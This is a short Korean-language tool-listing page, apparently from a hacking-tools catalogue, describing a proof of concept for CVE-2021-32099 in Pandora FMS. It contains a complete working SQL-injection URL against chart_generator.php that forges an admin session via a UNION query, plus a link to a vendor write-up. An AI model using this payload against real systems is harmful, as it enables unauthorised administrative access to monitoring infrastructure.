해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!
CVE-2021-32099에 대한 개념 증명 익스플로잇으로, Pandora FMS의 SQL 인젝션 취약점을 이용해 조작된 UNION 쿼리를 통한 세션 하이재킹을 시연합니다.
커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
모든 도구 탐색
도구 컬렉션을 둘러보세요
CVE-2021-32099
POC : http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
상세 정보 : https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained